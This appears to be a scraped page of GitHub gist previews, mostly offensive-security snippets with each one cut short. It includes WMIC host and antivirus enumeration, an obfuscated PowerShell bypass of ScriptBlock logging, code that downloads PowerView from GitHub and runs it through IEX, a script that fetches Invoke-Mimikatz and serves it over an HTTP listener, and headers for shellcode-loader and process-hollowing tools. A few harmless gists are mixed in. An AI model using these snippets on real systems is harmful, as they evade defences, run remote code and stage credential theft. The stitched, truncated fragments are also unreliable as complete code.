mathiasbynens

#!/bin/bash

if [ "$1" = "-h" -o "$1" = "--help" -o -z "$1" ]; then cat <<EOF
appify v3.0.1 for Mac OS X - http://mths.be/appify
Creates the simplest possible Mac app from a shell script.

Appify takes a shell script as its first argument:

    `basename "$0"` my-script.sh

juntalis

/*
 * fork.c
 * Experimental fork() on Windows.  Requires NT 6 subsystem or
 * newer.
 *
 * Copyright (c) 2012 William Pitcock <nenolod@dereferenced.org>
 *
 * Permission to use, copy, modify, and/or distribute this software for any
 * purpose with or without fee is hereby granted, provided that the above
 * copyright notice and this permission notice appear in all copies.

xorrior

Host Enumeration:

--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)

wmic computersystem LIST full

--- Anti-Virus ---

wmic /namespace:\\root\securitycenter2 path antivirusproduct

Dbof

import os
import sys
import time
from subprocess import Popen, DEVNULL
import datetime
from scapy.all import IP, UDP, NTP
from netfilterqueue import NetfilterQueue


def get_switch_ip():

Ridter

import System;
import System.Runtime.InteropServices;
import System.Reflection;
import System.Reflection.Emit;
import System.Runtime;
import System.Text;
 
//C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js
//C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js
 

nicholasmckinney

var actCtx = new ActiveXObject( "Microsoft.Windows.ActCtx" );
actCtx.Manifest = "C:\\Tools\\COM\\dynwrap.test.manifest";
try
{
	var DX = actCtx.CreateObject("DynamicWrapperX");
	DX.Register("user32.dll", "MessageBoxW", "i=hwwu", "r=l");  // Register a dll function.
	res = DX.MessageBoxW(0, "Hello, world!", "Test", 4);        // Call the function.
}
catch(e){ WScript.Echo("Fail");}

cobbr

# ScriptBlock Logging Bypass
# @cobbr_io

$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
    $GroupPolicyCache = $GroupPolicyField.GetValue($null)
    If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
    }

HarmJ0y

Add-Type -AssemblyName System.Security
$Content = (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')

$Bytes = ([Text.Encoding]::ASCII).GetBytes($Content)
$EncryptedBytes = [Security.Cryptography.ProtectedData]::Protect($Bytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)

IEX (([Text.Encoding]::ASCII).GetString([Security.Cryptography.ProtectedData]::Unprotect($EncryptedBytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)))

cobbr

$mk = (new-object net.webclient).downloadstring("https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1")
$Hso = New-Object Net.HttpListener
$Hso.Prefixes.Add("http://+:8080/")
$Hso.Start()
While ($Hso.IsListening) {
    $HC = $Hso.GetContext()
    $HRes = $HC.Response
    $HRes.Headers.Add("Content-Type","text/plain")
    If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') {
        $Buf = [Text.Encoding]::UTF8.GetBytes($mk)

smgorelik

/***************
 * Simple Process Hollowing in C# 
 *
 * #Build Your Binaries
 * 		c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe
 *  
 *  @author: Michael Gorelik <smgorelik@gmail.com>
 *  gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75
 * #Most of the code taken from here: @github: github.com/ambray